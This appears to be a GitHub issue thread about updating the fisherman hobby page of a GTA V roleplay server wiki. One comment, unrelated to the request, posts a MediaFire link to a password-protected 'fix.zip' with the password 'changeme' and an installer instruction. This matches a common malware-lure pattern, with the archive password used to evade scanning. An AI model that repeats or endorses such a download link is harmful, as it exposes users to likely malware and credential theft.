### ISSUE TITLE
[Fisherman] - Update

### ISSUE THREAD

**Issue by robertnitu02** [B-Zone-GTA-V/B-Zone-GTA-V-Wiki#33]
* Update https://b-zone-gta-v.github.io/B-Zone-GTA-V-Wiki/server/hobby/fisherman.html with latest informations

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Pant1limon** [comment]
done
